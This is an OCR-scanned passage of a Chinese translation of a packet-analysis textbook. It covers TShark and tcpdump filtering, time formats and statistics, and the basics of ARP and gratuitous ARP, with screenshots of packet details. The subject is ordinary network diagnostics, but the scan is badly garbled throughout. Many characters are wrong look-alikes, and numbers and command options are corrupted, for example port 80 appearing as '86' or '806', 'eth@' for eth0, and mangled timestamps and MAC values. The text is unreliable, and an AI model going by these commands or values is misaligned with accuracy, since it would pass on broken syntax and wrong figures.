示 。 


6.6 ”应 用 过 小 桥 


TShark 和 Tcpdump 的 过 滤 需 是 非 钊 郝 活 的 ， 因 为 它们 都 于 从 BPF 捕 

过 滤器 语法 。TShark 也 可 以 使 用 Wireshark 的 显示 过 滤器 表达 式 。 就 像 
Wireshark 一 样 ，IShark 的 捕获 过 滤 亏 可 以 边 捕 获 边 过 小， 也 可 以 在 捕获 
完成 后 过 滤 显 示 结 果 。 我 们 从 TShark 的 捕获 过 滤器 开始 讲 起 。 


使 用 -f 参 数 来 应 用 捕获 过 小 器 ， 在 双 引 号 内 请 遵从 BPF 的 语法 。 下 
面 这 条 命令 仪 会 抓 取 和 储存 目的 问 口 写 是 80 的 TCP 尝 量 : 





C:\Program Files\Wireshark>tshark -ni 1 -w packets.pcap -f "tcp port 80" 


使 用 -Y 来 应 用 显示 捕获 需 ， le J 
语法 。 在 抓 取 流量 的 过 程 中 ， 你 可 以 使 用 像 下 面 的 命 


C:\Program Files\Wireshark>tshark -ni 1 -w packets.pcap -Y "tcp.dstport == 


80" 





使 用 类 似 的 命令 显示 过 小 右 可 以 应 用 在 已 经 捕获 的 文件 中 。 以 下 命 
令 会 显示 packets.pcap 中 所 有 符合 过 小 表达 式 的 包 : 





C:\Program Files\Wireshark>tshark -r packets.pcap -Y "tcp.dstport == 86- 


在 Tcpdump 中 你 可 以 在 单 引号 里 构造 过 渡 表 达 式 ， 然 后 附 到 命令 的 
最 后 。 以 下 的 命令 依然 会 捕获 和 存储 目的 端口 号 是 80 的 TCP 流 量 : 


sanders@ppa:~$ tcpdump -nni eth@ -w packets.pcap 'tcp dst port 80' 


当 谈 取 捕 获 文件 时 你 也 可 以 构造 过 滤器 。 以 下 命令 会 显示 
packets.pcap 中 所 有 人 符合 过 小 表达 式 的 包 : 


sanders@ppa:~$ tcpdump -Fr packets.pcap 'tcp dst port 80'" 


南 要 牢记 的 一 点 是 ， 如 果 没 有 在 抓 包 的 时 候 指 明 过 泥 亏 ， 那 么 你 的 
捕获 文件 里 通常 会 含有 其 他 数据 包 。 读 取 这 个 捕获 文件 后 ， 你 仅仅 在 屏 
禹 上 限制 了 所 打出 来 的 内 容 。 


那么 如 果 你 有 一 个 包 合 大 量 各 种 类 型 数据 包 的 捕获 文件 ， 而 你 义 想 
把 需要 的 数据 包 过 滤 出 来 为 存 为 一 个 文件 ， 这 时 候 怎 么 办 昵 ? 你 可 以 结 
合 使 用 -w 和 -r 参 数 来 解决 : 


sanders@ppa:~$ tcpdump -Fr packets.pcap 'tcp dst port 806' -w http packets.p 
cap 


这 个 命令 会 先 谈 取 packets.pcap， 过 滤 出 目的 TCP 端 口 为 80 的 数据 包 
Chttp 用 的 问 口 ) ， 最 后 把 这 些 数 据 包 写 入 一 个 名 叫 http_packets.pcap 的 
新 文件 里 。 当 你 既 想 把 大 型 原文 件 .pcap 保 存 起 来 ， 又 想 在 某 时 专注 于 分 
析 其 中 一 小 部 分 时 ， 这 是 个 很 党 见 的 技巧 。 我 经 党 使 用 这 个 技巧 ， 特 别 
是 当 我 要 把 很 大 的 捕获 文件 用 Tcpdump 切 小 ， 然 后 再 放 人 到 Wireshark 里 分 

析 时 。 毕 葛 小 文件 更 加 容易 处 理 。 


除了 在 一 行 命令 后 面 直接 加 上 过 小 表达 式 ，Tcpdump 还 允许 你 指定 
一 个 包 合 一 系列 过 滤 右 的 BPF 文 件 。 这 在 有 些 情况 下 十 分 方便 ， 特 别 是 


当 你 要 应 用 一 个 极其 复杂 的 过 滤器 表达 式 ， 且 长 度 不 能 和 Tcpdump 的 命 
令 保 持 在 同一 行 时 。 你 可 以 使 用 -F 参 数 来 指派 一 个 BPF 过 滤器 文件 ， 就 
像 这 样 : 


sanders@ppa:~$ tcpdump -nni eth6 -F dns servers.bpf 


如 果 你 的 BPF 文 件 太 大 ， 那 么 你 也 许 会 加 一 些 注 释 ， 以 帮助 你 理解 
每 个 部 分 的 过 滤 表 达 陈 的 功能 和 结构 。 什 得 注意 的 是 ， 在 BPF 文 件 里 直 
接 加 注释 是 非法 的 ， 如 果 不 是 BPF 语 法 的 话 束 会 报错 。 但 义 因为 注释 对 
于 解密 大 型 BPF 文 件 是 非常 有 帮助 的 ， 所 以 我 通 沿 会 使 用 两 份 BPF 文 
0 是 载 入 到 tcpdump 里 的 ; 另 一 份 含 有 注释 以 


6.7 “TShark 里 的 时 间 显 示 格 式 


TShark 里 一 个 经 第 让 新 手 们 感到 困惑 的 问题 驶 是 默认 的 时 间 惟 。 它 
显示 从 数据 包 捕 获 开 始 的 相对 时 间 戳 。 有 些 时 候 这 种 时 间 戳 格式 还 比较 
有 用 ， 但 在 很 多 情况 下 你 想 看 到 的 是 包 捕 获 的 实际 时 间 ， 而 这 是 
Tcpdump 所 使 用 的 时 间 玲 默认 值 。 要 想 和 Tcpdump 的 输出 格式 一 样 ， 你 
可 以 使 用 -t 参 数 和 再 加 上 值 ad 以 显示 绝对 时 间 。 


C:\Program Files\Wireshark>tshark -r packets .pcap -七 ad 


这 里 是 一 个 基于 同样 的 捕获 文件 使 用 默认 的 相对 时 间 戳 和 和 绝对 时 
间 惟 傅 之 间 的 比较 : 


@ C:\Program Files\Wireshark>tshark -r packets .pcap -c2 
1 0.6600666 172.16.16.172 -> 4.2.2.1 ICMP Echo (ping) 
request 1d=60Xx660601，segq=17/4352，ttJl=128 
2 6.624566 4.2.2.1 -> 172.16.16.172 ICMP Echo (ping) 
reply Id=6Xx66601，seq=17/4352，ttl1=54 (request in 1) 
@ C:\Program Files\Wireshark>tshark -r packets.pcap -t ad -c2 
1 2015-12-21 12:52:43.116551 172.16.16.172 -> 4.2.2.1 ICMP Echo (ping 
) 
request 1Id=0Xx660601，segq=17/4352，ttJl=128 
2 2015-12-21 12:52:43.141651 4.2.2.1 -> 172.16.16.172 ICMP Echo (ping 
) 





reply Id=6Xx66601，seq=17/4352，ttl1=54 (request in 1) 


通过 使 用 -t 参 数 ， 你 可 以 目 定 义 时 间 显 示 格 式 ， 驳 像 你 在 Wireshark 
里 看 到 的 那样 。 这 些 格式 值 的 含义 都 在 表 6-1 中 。 


表 6-1 TShark 中 可 用 的 时 间 显 示 格 式 


包 被 捕获 的 绝对 时 间 《 在 您 的 时 区 ) 
包 补 捕获 的 带 日 期 的 绝对 时 间 在 您 的 时 区 ) 
目 之 前 捕获 的 数据 包 以 来 的 增 量 〈( 时 莽 》 


亿 元 时 间 (1970 年 1 月 1 日 以 来 的 秒 数 ) 
第 一 个 数据 包 和 当前 数据 包 之 间 的 运行 时 间 
u | 捕获 数据 包 的 绝对 时 间 (UTC) 
带 日 期 的 捕获 数据 包 的 绝对 时 间 (UTC) 





然而 Tcpdump 不 提供 这 样 多 层面 时 间 戳 格式 的 控制 。 
6.8 ”TShark 中 的 总 结 统 计 


TShark 的 男 一 个 有 用 的 功能 (也 是 比 Tcpdump 先 进 的 功能 ) ， 是 它 
可 以 从 捕获 的 文件 中 生成 统计 的 一 个 子 集 。 很 多 这 些 统 计 功 能 在 
Wireshark 中 都 能 找到 影子 ， 但 是 TShark 提 供 了 简单 的 命令 方式 来 进行 访 
间 。 使 用 -z 参 数 加 上 输出 的 名 字 可 以 生成 统计 信息 。 你 可 以 使 用 以 下 命 


令 焉 看 所 有 可 用 的 统计 : 


C:\Program Files\Wireshark>tshark -z help 


很 多 我 们 之 前 学 
端点 和 会 话 的 命令 : 


订 今 : 


C:\Program Files\Wireshark>tshark -r packets.pcap -z conv,1p 


命令 从 packets.pcap 中 打印 出 了 有 关 IP 会 


区 < 


如 图 6-3 所 未. 


学 过 的 功能 虱 可 以 用 -z 参 数 实现 。 这 


话 的 信息 的 统计 图 表 ， 
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{ping) 
(ping) 
(ping) 
(ping) 
(ping) 
(ping) 


"16.16. 


图 6-3 ”使 用 TShark 来 查看 会 


request 
reply 
request 
reply 
request 
reply 
request 
reply 
request 
reply 
request 
reply 
request 
reply 
request 
reply 
request 
reply 
request 
reply 
request 
reply 
request 
reply 


id-8x8881, 
id-8x8881 , 
id-8x8881 , 
id-8x8881, 
id=8x8881, 
id-8x8881 , 
id-8x8881 , 
id-8x8881, 
id-=-8x8881, 
id-8x8881 , 
id-8x8881 , 
id-8x8881, 
id-8x8881 , 
id-8x8881 , 
id-8x8881 , 
id=-8x8881, 
id-8x8881 , 


| Frames Bytes | | Frames Bytes | | Frames Bytes | 


seq=17/4352， 
seq=17/4352， 
seq=18/46688, 
seq=18/46688, 
seq=19/4864, 
seq=19/4864, 
seq=28/5128, 
seq=28/5128, 
seq=21/5376, 
seq=21/5376, 
seq=22/5632, 
seq=22/5632, 
seq=23/5888, 
seq=23/5888, 
seq=24/6144, 
Seq=24/6144, 
seq=25/6488, 
seq=25/6488, 
seq=26/6656, 
seq=26/6656, 
seq=27/6912， 
seq=27/6912， 
seq=28/7168, 
seq=283/71683， 


Total 


24 


1776 


ttl1=128 


ttl=54 {request i 


ttl=128 


ttl=54 {request i 


ttl1=128 


ttl=54 {request i 


ttl1=128 


ttl=54 {request i 


ttl1=128 


ttl=54 {request i 


tt1=128 


ttl=54 {request i 


ttl=128 


ttl=54 {request i 


ttl=128 


ttl=54 {request i 


ttl=128 


ttl=54 {request i 


ttl=128 


ttl=54 {request i 


ttl=128 


ttl=54 {request i 


ttl1=128 


ttl=54 {request i 


| Relative 
start 





话 统计 


文 其 中 包括 了 输出 


日 .BeBBeBeBeBeee 


你 也 可 以 使 用 这 个 参数 来 查看 特定 协议 的 信息 ， 如 图 6-4 所 示 。 你 
可 以 使 用 http, tree 选 项 ， 以 表 的 形式 来 分 解 HITP 的 请 求 和 返回 数据 包 。 


C:\Program Files\Wireshark>tshark -Fr packets.pcap -z http,tree 


男 一 个 非 党 有 用 的 功能 是 查看 已 完成 排序 的 输出 流 ， 跑 像 之 前 我 们 
在 Wireshark 里 先 右 键 单 击 一 个 数据 包 然 后 选择 “跟随 TCP 流 ”一 样 。 要 想 
获得 这 个 输出 ， 我 们 需要 使 用 follow 选 项 ， 并 且 指 明 流 的 类 型 、 输 出 模 
式 和 我 们 想 显 示 出 的 流 。 你 可 以 通过 会 话 统 计 最 左 列 的 序 写 来 表示 一 上 段 
流 ， 类 似 命 了 令 如 下 所 示 : 


[c:\program Files\Wireshark>tshark -r http google.pcap -z follow, tcp,ascii,g| 





E Administrator Command prompt - 


HTTP/Packet Coun 
Topic / Item n Ver in V Vv n Burst rate Burst start 


Total HTTP Packets 
HTTP Request Packets 
GET 
NOTIFY 
SEARCH 
HTTP Response Packets 
3xx: Redirection 
364 Not Modified 


4xx: Clien t i 

4064 Not Found 

»33: broken 

5xx: Server Error 

ixx: Informational 
rr HTTP Packets 





图 6-4 ”使 用 TShark 来 查看 HTTP 请 求 和 返回 统计 


这 条 命令 还 会 以 ASCII 形 式 将 http_google.pcap 的 0 号 TCP 流 打印 到 屏 
幕 上 。 这 个 命令 的 输出 如 下 上 所 示 : 


C:\Program Files\Wireshark>tshark -r http google.pcap -z 


--SN1ip-- 


Follow: tcp,ascii 

Filter: tcp.stream eq 0 

Node 6: 172.16.16.128:1666 

Node 1: 74.125.95.10604:80 

627 

GET / HTTP/1.1 

Host: www.google.com 

User-Agent: Mozilla/5.60 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) 
Gecko/26691221 Firefox/3.5.7 

Accept: text/html,application/xhtml+xml,application/xml;q=060.9,*/*;q=0.8 
Accept-Language: en-us,en;q=0.5 

Accept-Encoding: gzip,deflate 

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;qd=0.7 

Keep-Alive: 3060 

Connection: keep-alive 

Cookie: PREF=ID=257913a938e6c248:U=267c896b5f39fb8b:FF=4:LD=e 

Nn:NR=160: TM=126867386654:LM=1265479336:GM=1:S=h1UBGonTuWU3D23L; 
NID=31=Z-nhwM]JUP63eotYMTp-3T11gMSPnNS1eM1KN1 DUrnO2zW1icPM4JE3AJec9b 
vVG-YFibFXszOApfbhBA1BOX4dKx4L8ZDdeikwqekgP5 kzELtC2mUHx7RHx3PIttcuzZ 


14066 
HTTP/1.1 266 OK 
Date: Tue, 6869 Feb 206106 61:18:37 GMT 
Expires: -1 


Cache-Control: private, max-age=0 
Content-Type: text/html; charset=UTF-8 
Content-Encoding: gzip 

Server: gws 

Content-Length: 4633 

X-XSS-Protection: 6 





你 也 可 以 通过 提供 地 址 细 市 ， 来 指明 想 要 全 看 哪个 数据 法。 例如 ， 
下 面 的 命令 会 获取 一 个 指明 咒 扣 和 刀口 的 UDP 流 : 





这 条 命令 会 打印 packets.pcap 中 端口 23429 上 的 192.168.1.5 站 点 和 器 
口 53 上 的 4.2.2.1 端 点 的 UDP 流 。 


以 下 是 我 个 人 了 最 爱 的 统计 选项 。 


ip_hosts,tree: 在 一 段 捕 获 中 显示 每 个 IP 地 址 ， 并 统计 每 个 IP 地 址 
在 所 占 流量 的 比率 。 


io, phs: 分 层级 统计 在 捕获 文件 中 找到 的 所 有 协议 。 

http,tree: 显示 天 于 HTTP 请 求 和 回应 的 统计 。 

http_req,tree: 显示 每 个 HTTP 请 求 的 统计 。 

smb,srt: 显示 关于 Windows 会 话 的 SMB 命 令 的 统计 。 
endpoints,wlan: 显示 无 线 绵 点 。 

expert: 从 捕获 中 显示 专家 信息 〈 对 话 、 钳 误 等 ) 。 

当 你 使 用 -z 参 数 时 会 有 很 多 有 用 的 选项 ， 把 它们 都 摘 述 一 过 会 占用 


大 量 的 篇 幅 。 但 是 如 果 你 经 常 使 用 TShark， 我 还 是 建议 你 在 官方 文档 上 
化 点 时 间 学 习 一 下 所 有 可 用 的 选项 。 


6.9 TShark VS Tcpdump 


本 革 介 绍 了 两 个 基于 命令 行 的 数据 包 分 析 应 用 ， 它 们 部 能 很 好 地 胜 
任 分 内 的 工作 ， 而 且 无 论 其 中 哪 一 球 部 可 以 通过 各 种 选项 来 完成 你 手头 
上 的 任何 工作 。 这 里 列 出 两 个 工具 的 几 点 差别 ， 可 以 让 你 根据 再 求 选择 
最 适合 的 那个 。 


操作 系统 : Tcpdump 只 能 在 基于 UNIX 的 系统 下 运行 ， 而 TShark 既 
可 以 工作 在 Windows 下 ， 又 可 以 工作 在 基于 UNIX 的 系统 下 。 


协议 支持 : 两 个 工具 都 文 持 第 见 的 第 3 层 和 第 4 层 的 协议 ， 但 
Tcpdump 对 第 7 层 的 协议 文 持 不 足 。IShark 提 供 了 丰 遇 的 第 7 层 协 议 文 
持 ， 因 为 它 在 底层 使 用 Wireshark 的 协议 解析 器 。 


分 析 功 能 : 两 个 工具 都 必须 依赖 手工 分 析 才 能 生成 有 价值 的 结果 。 
但 是 TShark 还 提供 了 类 似 于 Wireshark 的 强大 统计 分 析 功 能 ， 在 GUI 不 可 
用 时 能 够 协助 分 析 。 


其 实 个 人 习惯 和 工具 的 可 用 性 才 有 是 选择 哪个 应 用 的 次 定性 因 系 。 笠 
运 的 是 ， 这 些 工 具 的 使 用 方 却 都 是 关 似 的 ， 学 会 其 中 一 个 珊 能 很 保 上 手 
为 一 个 ， 正 所 谓 拉 多 不 压 时 。 


第 7 音 ”网 络 层 协议 





无 论 古 处 理 延 迟 问 题 ， 还 是 黑 列 存在 错误 的 应 用 ， 捉 或 是 对 安全 威 
胁 进行 聚焦 检查 以 友 现 异常 流量 ， 你 都 必须 首先 了 解 正 常 流量 。 在 下 面 
的 几 章 中 ， 我 们 按照 OSI 醒 型 由 撒 层 到 高 层 进行 介绍 ， 你 将 会 学 到 正 季 
网 络 流 量 在 数据 包 级 别 是 如 何 工 作 的 。 在 每 个 苏 议 的 相关 部 分 ， 都 会 至 
少 有 一 个 捕获 文件 供 你 下 载 ， 并 可 以 让 你 百 氨 上 手 分 析 。 


在 这 一 章节 里 ， 我 们 会 着 重 关 注 网 络 通 信 的 “ 搬 拟 工 " 网 络 层 的 协 
议 : ARP、IPv4、IPv6、ICMP 和 ICMP6。 


接 下 来 的 3 个 章节 可 能 是 全 书 的 重点 。 如 果 你 跳 过 了 它们 ， 就 好 比 
在 感恩 节 晚 餐 上 不 使 用 烤箱 一 样 。 即 使 你 已 经 对 每 个 协议 如 何 工 作 有 了 
一 定 的 了 解 ， 把 这 几 章 快速 略 读 一 遍 也 是 对 数据 包 结构 进行 复习 的 过 


程 。 
7.1 地 址 解析 协议 


网 络 上 的 通信 会 使 用 到 逻辑 地 址 和 物理 地 址 。 效 辑 地 址 允许 不 同 网 
络 以 及 间接 相连 的 设备 之 间 相 互通 信 ， 物 理 地 址 则 用 于 同一 网 段 中 年 接 
使 用 交换 机 相互 连接 的 设备 之 间 进 行 的 通信 。 在 大 多 数 悄 况 下 ， 正 昭通 
信和 需要 这 两 种 地 址 协同 工作 。 

我 们 假设 这 样 一 个 场景 : 你 需要 和 网 络 中 的 一 个 设备 进行 通信 ， 这 
个 设备 可 能 是 余 种 服务 占 ， 或 者 只 是 你 想 与 之 共 圣 文件 的 为 一 个 工作 
站 。 你 用 来 创建 这 个 通信 的 应 用 已 经 得 到 了 这 个 远程 主机 的 IP 地 址 ( 通 


过 DNS 服务 ， 这 将 在 第 9 章 中 介绍 ) ， 也 意味 着 系统 已 经 拥有 了 所 有 其 
需要 的 信息 ， 用 来 构建 它 想 要 在 第 3 层 到 第 7 层 中 传递 的 数据 包 。 这 时 它 
a 唯一 信息 束 古 第 2 层 包 含有 目标 主机 MAC 地 址 的 数据 链 路 层 数 
是 。 


之 所 以 需要 MAC 地 址 ， 是 因为 网 络 中 用 于 连接 各 个 设备 的 交换 机 
使 用 了 内 容 寻 址 寄存 右 (CAM) 。 这 个 表 列 出 了 它 在 每 一 个 靖 口 的 所 
有 连接 设备 的 MAC 地 址 。 当 交换 机 收 a 到 了 一 个 指 癌 特定 MAC 地 址 的 流 
量 时 ， 它 会 使 用 这 个 表 来 确定 应 该 使 用 哪 一 个 端口 肥 壕 沉 量 。 如 果 目 标 
的 MAC 地 址 是 未 知 的 ， 则 这 个 传输 设备 会 自 和 完 在 它 的 绥 存 中 俘 找 这 个 
ee ee 那么 这 个 地 址 就 需要 在 网 络 上 进行 额外 的 通信 来 
进行 解析 本。 


TCP/P 网 络 〈 基 于 IPv4) 中 用 来 将 IP 地 址 解析 为 MAC 地 址 的 过 程 称 
为 地 址 解析 协议 (Address Resolution Protocol ARP) 。 这 个 协议 在 
RFC826 中 进行 了 定义 ， 它 的 解析 过 程 只 使 用 两 种 数据 包 : 一 个 ARP 请 
求 与 一 个 ARP 啊 应 〈 见 图 7-1) 。 


| 注 志 晴晴 时时 时 时 时 寺 灶 灶 和 和 


RFC(Request for Comments) 是 定义 协议 实现 标准 的 官方 文档 。 你 可 以 在 RFC Editor 的 首 
页 上 搜索 RFC 文 档 进 一 步 了 解 。 





这 个 传输 计算 机 会 发 出 一 个 ARP 请 求 ， 基 本 上 就 是 问 “ 大 家 好 ， 我 
的 IP 地 址 是 192.168.0.101，MAC 地 址 是 f2: f2: f2: f2: f2: 刀 。 我 需要 问 那 
个 耻 地 址 是 192.168.0.1 的 家 伙 发 些 东 西 ， 但 我 不 知道 它 的 硬件 地 址 ， 你 
们 谁 有 这 个 IP 地 址 ， 可 否 回 复 给 我 你 的 MAC 地 址 ?>” 


这 个 数据 包 将 被 广 播 给 网 段 中 的 所 有 设备 。 不 是 这 个 耻 地 址 的 设备 
将 人 简 早 地 技工 这 个 数据 包 ， 而 拥有 这 个 IP 地 址 的 设备 将 友 送 一 个 ARP 啊 
应 ， 束 像 是 说 :“ 你 好 ， 传 输 设 备 ， 我 束 古 你 要 找 的 那个 IP 地 址 为 
192.168.0.101 的 目标 设备 。 我 的 MAC 地 址 是 02:f2: 02:f2: 02:f2。” 







ARP 请 求 






源 I|P 地 址 : 192.168.0.101 
源 MAC 地 址 : 从 :从 :从 :从 :从 :和 从 
目标 IP 地 址 : 192.168.0.1 

目标 MAC 地 址 : 00:00:00:00:00:00 







/ES \ 


源 IP 地 址 : 19 2.168.0.1 
源 MAC 地 址 : 02:{2:02 :f2:02: 公 
目标 IP 地 址 : 192.168.0.101 T 


目标 MAC 地 址 : 人 2: 有 2: 人 2: 从: 人 2: 人 2 [| | 
A 





图 7-1 ARP 解析 的 过 程 


一 旦 这 个 解析 过 程 完成 了 ， 传 输 设 备 束 会 将 这 个 目标 设备 的 MAC 
和 了 王 的 对 应 关系 更 新 进 它 的 缓存 ， 并 且 开 始 传输 数据 。 





在 Windows 主 机 中 ， 你 可 以 通过 在 命令 行 中 键入 arp -a 来 但 看 ARP 表 。 





通过 实际 情况 来 观察 地 址 解析 的 这 个 过 程 ， 有 助 于 你 更 好 地 理解 它 
Ee 
策 报 头 。 


7.1.1 ARP 汰 


如 图 7-2 所 示 ，ARP 头 包含 下 列 的 几 个 域 。 
硬件 类 型 : 数据 链 路 层 使 用 的 类 型 数据 。 在 大 多 数 情况 下 ， 类 型 都 


是 以 太 网 (类 型 1) 。 


/| 0 | 

EE 

3 3 T7777 
目标 硬件 地 址 


图 7-2 ”ARP 数据 包 结 构 
协议 类 型 : ARP 请 求 正 在 使 用 的 高 层 协议 。 
便 件 地 址 长 上 度 正在 使 用 的 人 鲁 件 地 址 的 长 度 〈 八 位 组 / 字 市 〉。 


协议 地 址 长 度 : 对 于 指定 协议 类 型 所 使 用 的 逻辑 地 址 的 长 度 ( 八 位 
组 / 字 节 ) 。 


操作 : ARP 数 据 包 的 功能 ，1 表 示 请 求 ，2 表 示 响 应 。 

及 这 方 便 件 地 址 : 友 运 者 的 便 件 地 址 。 

发 送 方 协议 地 址 : 发 送 痢 的 下 协议 地 址 。 

目标 硬件 地 址 : 目的 接收 方 的 硬件 地 址 CARP 请 求 中 为 0) 。 
目标 协议 地 址 : 目的 接受 方 的 高 层 协议 地 址 。 


现在 打开 arp_resolution.pcap 这 个 文件 ， 束 可 以 看 到 实际 的 解析 过 
程 。 我 们 将 对 这 个 过 程 中 的 每 个 数据 包 单 独 进行 分 析 。 


4 





7.1.2 ”数据 包 1: ARP 请 求 


如 图 7-3 所 示 ， 第 1 个 数据 包 是 一 个 ARP 请 求 。 我 们 可 以 通过 在 
Wireshark 的 Packet Details 面 板 中 ， 检 得 以 太 网 头 ， 来 确定 这 个 数据 包 是 
否 真 的 是 一 个 广播 数据 包 。 这 个 数据 包 的 目的 地 址 是 
(和 任 : 任 : 任 : 任 :在 : 任 ) ， 这 是 以 太 网 中 的 广播 地 址 ， 所 有 发 送 到 这 个 地 址 的 
数据 包 都 会 被 广播 到 当前 网 段 中 的 所 有 设备 。 这 个 数据 包 中 以 太 网 头 的 
源 地 址 就 是 我 们 的 MAC 地 址 。 


| Wireshark . Packet 1 . arp_resolution 





ame 1: 42 we n wire (336 bits), 42 bytes captured (336 bits) 
Ee i (80:16:ce:6e:8b:24), Dst: Broadcast (ff:ff:ff:ff:ff:ff) 
ion: Broadcast (ff:ff:ff:ff:ff:ff) 各 
ce: HonHaipr 6e:8b:24 (08:16:ce:6e:8b:24)@ 
he ARP A x8886) 
Res 


lution Protocol (request) 
are pe Ethernet (1) 
Protocol ee: IPv4 X0888) 


ss: HonHaipr 6e:8b:24 (09:16:ce:6e:8b:24) 
ss: 192.168.08.1]14 
Target MAC address: 86:88:88 00:098:09 【90:00:99:09:90:00) 全 
Target IP address: 192.168.0.1 © 


No.: 1 * Time: 0.000000 * Source: HonHaipr Ge:Bb:24 " Destination’ Broadcast ° Protocol: ARP Length: $2 * Into: Who has 192.168.0.17 Tel 192,168.0.114 





图 7-3 一 个 ARP 请 求 数据 包 


在 这 个 给 定 的 结构 中 ， 我 们 可 以 确定 这 的 确 是 一 个 在 以 太 网 上 使 用 
的 ARP 请 求 。 这 个 ARP 头 列 出 了 发 送 方 的 下 地 址 〈192.168.0.114) 和 
MAC 地 址 (00:16:ce:6e:8b:24) ， 以 及 接收 方 的 IP 地 址 192.168.0.1。 由 于 
日 标的 MAC 地 址 ， 也 就 是 我 们 想 要 得 到 的 信息 ， 还 是 未 知 的 ， 因 此 这 
里 的 目的 MAC 地 址 填写 为 00:00:00:00:00:00。 


7.1.3 ”数据 包 2: ARP 啊 应 


在 我 们 对 于 最 初 请 求 的 啊 应 中 ( 见 图 7-4) ， 第 一 个 数据 包 中 的 源 
MAC 地 址 成 为 了 这 个 以 太 网 头 中 的 目的 地 址 。 这 个 ARP 啊 应 和 之 前 的 
ARP 请 求 看 上 去 很 像 ， 除 了 以 下 几 点 。 


翅 Wireshark . Packet 2 .arp resolution 





Frame 2: 46 bytes on wire (368 bits), 46 bytes captured (368 bits) 
Y Ethernet II, Src; D-LinkCo 8b:22;ba (88:;13;46;8b:22:;ba), Dst; HonHaiPpr 6e;8b;24 (88;16:ce:6e:;8b:;24) 
Destination: HonHaipr 6e:8b:24 (88:16:ce:6e:8b:24) 
” Source: D-LinkCo 6b:22:ba (080:13:46:8b:22:ba) 
Type : ARP (6x8806) 
railer: c8a80072 
Y ss Resolution Protocol (reply) 
aa type: Ethernet (1) 
Protocol pe IPv4 a 
刁 ize: 6 


ress:; D-LinkCo 8b:22:;ba (88:13:46:8b:22:ba)@ 
ss: 192.168.0.1 

Target MAC address: HonHaiPr G6e:8b:24 (08:16:ce:Ge:8b:24) 

Target IP address: 192.168.0.114 








No.r 2 * Time: 0. DOA08I * Source: DiinkCo Obra2ba * Destination: Honiaipr Ge:Bbras ° Protoeol: ARP * Length: 46 * Infor 192,160.0,1 is at O013:46r0b:22rba 





图 7-4 一 个 ARP 回 复数 据 包 


。 数据 包 的 操作 人 码 (opcode) 现在 是 0x0002， 用 来 表示 这 是 一 个 啊 应 
而 不 是 请 求 。 

@ 地 址 信息 进行 了 颠倒 
的 MAC 地 址 和 IP 地 址 。 

。 最 重要 的 是 ， 现 在 数据 包 中 所 有 的 信息 都 是 可 用 的 ， 也 惑 是 说 我 们 
现在 有 了 192.168.0.1 主 机 的 MAC 地 址 (00:13:46:0b:22:ba) 。 





发 送 方 的 MAC 地 址 和 IP 地 址 现在 变 成 了 日 


7.1.4 Gratuitous ARP 


在 我 的 家 乡 ， 当 一 些 事 是 所 谓 “Gratuitously〈 免 费 、 无 偿 ) ”的 时 
的 含义 。 但 无 偿 发 送 的 Gratuitous ARP 却 是 一 个 
好 东西 。 


在 多 数 情况 下 ， 一 个 设备 的 卫 地 址 是 可 以 改变 的 。 当 这 样 的 改变 发 
生 后 ， 网 络 中 主机 缓存 里 的 了 了 和 MAC 地 址 的 映射 就 失效 了 。 为 了 防止 造 
成 通信 错误 ，Gratuitous ARP 请 求 会 被 发 送 到 网 络 中 ， 强 制 所 有 收 到 它 
的 设备 去 用 新 的 卫 和 MAC 地 址 映射 更 新 缓存 〈 见 图 7-5) 。 






源 IP 地 址 : 192.168.0.101 
源 MAC 地 址 : 从 :从 :从 :2: 从 :从 
目标 IP 地 址 P: 192.168.0.101 
目标 MAC 地 址 : 00:00:00:00:00:00 







图 7-5 ”Gratuitous ARP 工 作 过 程 


几 个 不 同 的 情形 都 会 产生 Gratuitous ARP 数 据 包 ， 其 中 常见 的 就 是 
IP 地 址 的 改变 。 打 开 arp_gratuitous.pcap 捕 获 文 件 ， 你 就 会 看 到 一 个 实际 
例子 。 这 个 文件 只 包 侣 一 个 数据 包 〈 见 图 7-6) ， 因 为 这 就 是 Gratuitous 
ARP 数 据 包 的 全 部 了 。 


检查 这 个 以 太 网 报头 ， 你 会 看 见 这 个 数据 包 以 广播 的 形式 发 送 ， 以 
便 网 络 上 的 所 有 主机 能 够 接收 到 它 。 这 个 ARP 头 看 上 去 和 ARP 请 求 很 
像 ， 除 了 发 送 方 的 IP 地 址 和 目标 IP 地 址 是 相同 的 。 在 这 个 数据 包 被 网 络 
中 的 其 他 主机 接收 到 之 后 ， 它 会 让 这 些 主机 使 用 新 的 地 地 址 和 MAC 地 址 
关系 来 更 新 它们 的 ARP 表 。 由 于 这 个 ARP 数 据 包 是 未 经 请 求 的 ， 却 导致 
各 户 痛 更 新 ARP 缓 存 ， 因 此 会 称 之 为 Gratuitous ARP。 


是 Wireshark . Packet 1 . arp gratutous 


> Frame 1: 68 bytes on wire (488 bits), 68 bytes captured (488 bits) 
v Ethernet II, Src: IntelCor b7:f2:f5 (G80:63:47:b7:f2:f5), Dst: Broadcast (ff:ff:ff:ff:ff:ff) 
Destination: Broadcast 【ff:ff:ff:ff:ff:ff) @O 
source: IntelCor b7:f2:f5 (88:83:47:b7:f2:f5) 
Type: ARP (8x88686) 
Padding: D9960060DDBBDDDBDDDBBBBDBBDDB6 
Y Address Resolution Protocol 【request/gratuitous ARP) 
Hardware type: Ethernet (1) 
Protocol type: IPv4 (8x8888) 
Hardware size: 6 
Protocol size: 4 


ss: Intelcor b7:f2:f5 (600:83:47:b7:f2:f5) 
ss 24.6.125.19 

Target MAC address: 88:88:88 86:808:808 【698:0D:00:08:00:08) 
@ Target IP address: 24.6.125.19 








No I * Time: DO * Sowrce: ImelCor br7rforts » Destinstion: Brosoeast * Protoeol: ARP * Length: 60 * Info: GYratuitous ARP tow 24.,6, 125,19 (Redqwest) 


et 





图 7-6 一 个 Gratuitous ARP 数 据 包 


你 会 在 一 些 不 同 的 情形 下 注意 到 Gratuitous ARP 数 据 包 的 存在 。 如 
上 所 示 ， 设 备 IP 地 址 的 改变 会 生成 它 ， 并 且 一 些 操 作 系 统 也 会 在 局 动 时 


进行 无 偿 ARP 的 发 送 。 此 外 ， 你 可 能 会 注 站 到， 一 些 系统 使 用 Gratuitous 
ARP 数 据 包 进行 对 流入 流量 的 负载 均衡 。 


7.2 互联 网 协议 


位 于 OSI 模 型 中 第 3 层 的 协议 的 主要 上 日 的 就 是 使 得 网 络 间 能 够 互联 沟 
通 。 上 市 中 提 到 的 MAC 地 址 被 用 来 在 第 2 层 人 处理 同一 网 络 中 的 通信 。 与 
